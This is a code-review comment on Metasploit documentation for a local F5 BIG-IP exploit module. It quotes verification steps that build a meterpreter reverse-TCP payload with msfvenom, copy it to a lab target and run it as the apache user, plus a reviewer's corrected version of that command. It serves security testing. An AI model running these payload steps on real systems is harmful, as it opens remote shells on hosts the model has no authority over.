documentation/modules/exploit/linux/local/f5_create_user.md

```diff
@@ -0,0 +1,168 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf`)
```

Comment:
```suggestion
3. Do: Get a non-root session somehow (eg: `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp` then `./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
chmod +x /tmp/testexploit.elf
sudo -u apache /tmp/testexploit.elf
EOF`)
```
I was getting the following error when copying step 3: `sudo: /tmp/testexploit.elf: command not found` .
The above worked for me. I think you need to chmod the file before running it - running two commands in a oneliner after sshing to the target led me to direct the output of EOF into bash